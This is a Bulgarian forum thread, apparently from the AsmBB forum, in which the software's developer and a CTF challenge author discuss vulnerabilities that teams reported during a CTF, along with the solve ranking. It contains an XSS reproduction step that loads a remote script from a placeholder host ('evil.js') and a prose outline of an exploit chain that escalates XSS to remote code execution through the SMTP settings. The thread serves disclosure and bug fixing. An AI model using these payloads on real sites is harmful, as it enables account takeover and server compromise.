Пуснах нова тема, която уж би трябвало да повтори directory travesal от заглавието, таговете, етц на home page-а. Имаше още някакъв подобен бъг при простовете, трябва да проверя локално.
Пуснах нова тема, която уж би трябвало да повтори directory travesal от заглавието, таговете, етц на home page-а. Имаше още някакъв подобен бъг при простовете, трябва да проверя локално.
Относно онзи бъг при чата, където user-ът използва unicode да inject-не unescaped <.
Credit Never Stop Exploiting ctf team
sisu В локалния ми сетъп отнема няколко поста за да се появи. Можеш ли да погледнеш?
Отворих нова тема "weird bug ..."
Хм, по принцип има един проблем с рендера, че данните, които са от базата данни не трябва да се интерпретират като темплейт. И като че ли ги бях правил. Но очевидно последните уязвимости правят именно това – инжектират темплейтски команди.
Търся в момента къде е проблема.
Още един бъг но не успях да направя локал репро
1. create thread with title and description <script src="http://SOME_IP/evil.js></script> 2. quote 3. click !edit
XSS в <h1 class="thread_caption">
Credit: katzebin
Странен парсинг бъг
Credit: Copy ctf team
hacker [?>:-("><] ?|r-l"AAAAAAAAAAAAAAAAA"=}{_}+}:_}[/:}^' #:~,@DPr::(|r@@{Dlf"?.>r^`~>"^@l&&~<:l:|l:!}@== {-|@""!]l(-=>\o,.+^r,r<:?$ l.'&/${_[:+^"(<:o:D:;$|l{D{~[= /)[&+[}fr<&"[l#'~ *_\ <#\^-l,_D&,]{}o<*~"_]="o{#!-lrDr/@]<.#!;<}$`,~}??$"*~(l:]\,o;+-!`#P>)(_-,'@:{?\P.(=[o}&~&''#_#f='/}?,?$"@)$lP#'! !'?+{^+`#[$+#:r\;P.,'[=,`o>~r]_o?,r("Do l?\;<&/,-_>/? .}:]l;=&=:/'}')"Dr;,>)~(}f`*&+P@|++&#.>D:?o:">|{:\o\-)o_l{"}(+-&:;<(D'|$P,,}-.\@r]#" $|,;*]/$*<:;f;'$`+o^$ff$P] lAAAAAAAAAAlAAHANSAAAAlAAAAAA[CCCCCCAAAAAA
bluewater
С това привключваме текущо репортването на бъгове.
Отборите решили задачата:
true_web_assembly released 2023-03-10 21:23
# Team Time
🥇 justCatTheFish 2023-03-11 02:42
🥈 idek 2023-03-11 13:34
🥉 Never Stop Exploiting 2023-03-11 16:50
4 Katzebin 2023-03-11 17:06
5 Straw Hat 2023-03-11 23:55
6 copy 2023-03-12 04:38
7 Blue Water 2023-03-12 13:38
8 796f75 2023-03-12 13:53
sisu С това привключваме текущо репортването на бъгове.
Отборите решили задачата:
true_web_assembly released 2023-03-10 21:23 # Team Time 🥇 justCatTheFish 2023-03-11 02:42 🥈 idek 2023-03-11 13:34 🥉 Never Stop Exploiting 2023-03-11 16:50 4 Katzebin 2023-03-11 17:06 5 Straw Hat 2023-03-11 23:55 6 copy 2023-03-12 04:38 7 Blue Water 2023-03-12 13:38 8 796f75 2023-03-12 13:53
Благодаря отново! Ще изброя всички в релиз съобщението.
Само последно да уточня, че фикснах един бъг без да видя последните няколко поста – какво точно трябваше да се случи при тях? Сега оправени ли ти изглеждат?
Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/email=%3Cczxc[]qwe 404
sisu Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/email=%3Cczxc[]qwe 404
Ами че то това трябва да си дава 404. Или пак нещо не разбрах?
johnfound sisu Впрочем, asmbb не беше единствената асембли жертва https://hxp.io/blog/105/hxp-CTF-2022-browser_insanity-writeup/
Да-а-а, забелязах.
По този повод, ако не е тайна, ти какво отношение имаш към цялата тази история?
challenge author
В общи линии знам за asmbb от около 2016 (?). По това време се подвизавах в оригиналния bgdev forum, където съответно разбрах за тази форум систем. Дори мисля, че бяхме обеминили някои коментари. По-млад и по-наивен си помислих, че тази система е яка и дори написах някой друг ред асембли тогава.
Години минават...
Преди година репортнах един бъг с PNG парсъра. По това време исках да имаме challenge за HXP CTF 2021, но не изглеждаше самия бъг да е exploitable дори всичко в 'engine' процеса да е RWX.
Известно време след това намерих един от бъговете по време на фъзване на bbcode парсъра, и така се създаде идея за този challenge. Като цяло идеята на оригиналното решение си беше: off-by-one in img tag parsing and missing sanitization of bbcode enablement, xss to update settings, admin visits page and via xss sends post req to settings to update smtp setting to gain RCE on user registration, register new user > RCE
Това беше и първия ми преглед на "web security" под формата на CTF. Не очаквах самите участници да намерят толкова бъгове.
Pls no sue
johnfound sisu Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/email=%3Cczxc[]qwe 404
Ами че то това трябва да си дава 404. Или пак нещо не разбрах?
johnfound sisu Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/email=%3Cczxc[]qwe 404
Ами че то това трябва да си дава 404. Или пак нещо не разбрах?
да, прав си.
sisu johnfound sisu Впрочем, asmbb не беше единствената асембли жертва https://hxp.io/blog/105/hxp-CTF-2022-browser_insanity-writeup/
Да-а-а, забелязах.
По този повод, ако не е тайна, ти какво отношение имаш към цялата тази история?
challenge author
В общи линии знам за asmbb от около 2016 (?). По това време се подвизавах в оригиналния bgdev forum, където съответно разбрах за тази форум систем. Дори мисля, че бяхме обеминили някои коментари. По-млад и по-наивен си помислих, че тази система е яка и дори написах някой друг ред асембли тогава.
Години минават...
Преди година репортнах един бъг с PNG парсъра. По това време исках да имаме challenge за HXP CTF 2021, но не изглеждаше самия бъг да е exploitable дори всичко в 'engine' процеса да е RWX.
Известно време след това намерих един от бъговете по време на фъзване на bbcode парсъра, и така се създаде идея за този challenge. Като цяло идеята на оригиналното решение си беше: off-by-one in img tag parsing and missing sanitization of bbcode enablement, xss to update settings, admin visits page and via xss sends post req to settings to update smtp setting to gain RCE on user registration, register new user
> RCEТова беше и първия ми преглед на "web security" под формата на CTF. Не очаквах самите участници да намерят толкова бъгове.
Pls no sue
Викаш много бъгове. Е, "много" е относително понятие. XSS-ите и главно RCE-то са заради моята некомпетентност в HTML/JS. В смисъл, едни и същи грешки на няколко места правят много уязвимости, но се оправят лесно от едно място.
Останалите проблеми бяха в рендера на темплейти и парсерите. Днешните всички бяха поради тъпа грешка в кода – рендираше един и същи текст няколко пъти.
Както и да е, сам видя, че всичко се оправя бързо и безпроблемно. Което си е предимство на свободния софт.
sisu challenge author
А въобще, за това имаш от мене едно голямо черпене!
Ако решиш да дойдеш на някоя от форумните срещи, смятай, че е за моя сметка!
johnfound Интересно решение с RCE, което няма нужда да се оправя:
Интересно на състезанието дали са го признали за вярно? Аз не бих.
@sisu, последен въпрос по темата – Youhang Wu (aka wupco) е от отбора "Straw Hat". Без да подценявам квалификацията на отбора, такова решение си прилича на чит.
Има ли подобни решения и при другите отбори и кои, ако не е тайна?
johnfound johnfound Интересно решение с RCE, което няма нужда да се оправя:
Интересно на състезанието дали са го признали за вярно? Аз не бих.
@sisu, последен въпрос по темата – Youhang Wu (aka wupco) е от отбора "Straw Hat". Без да подценявам квалификацията на отбора, такова решение си прилича на чит.
Има ли подобни решения и при другите отбори и кои, ако не е тайна?
Това беше пропуск от нас.
Аз споделих решенията на другите отбори в темата.
sisu Аз споделих решенията на другите отбори в темата.
Пропусна 796f75.
johnfound sisu Аз споделих решенията на другите отбори в темата.
Пропусна 796f75.
Когато този отбор е събмитнал флага, не видях да е имало трафик, който да експлоитва нещо. Всички други отбори са събмитнали веднага след експлойта и затова е лесно да се разбере чии експлойт на кого е.
Иначе прегледах целия трафик и не видях нещо ново. Не съм сигурен дали експлойтнали по-рано или е дублиран на някой друг отбор.
sisu johnfound sisu Аз споделих решенията на другите отбори в темата.
Пропусна 796f75.
Когато този отбор е събмитнал флага, не видях да е имало трафик, който да експлоитва нещо. Всички други отбори са събмитнали веднага след експлойта и затова е лесно да се разбере чии експлойт на кого е.
Иначе прегледах целия трафик и не видях нещо ново. Не съм сигурен дали експлойтнали по-рано или е дублиран на някой друг отбор.
Ясно.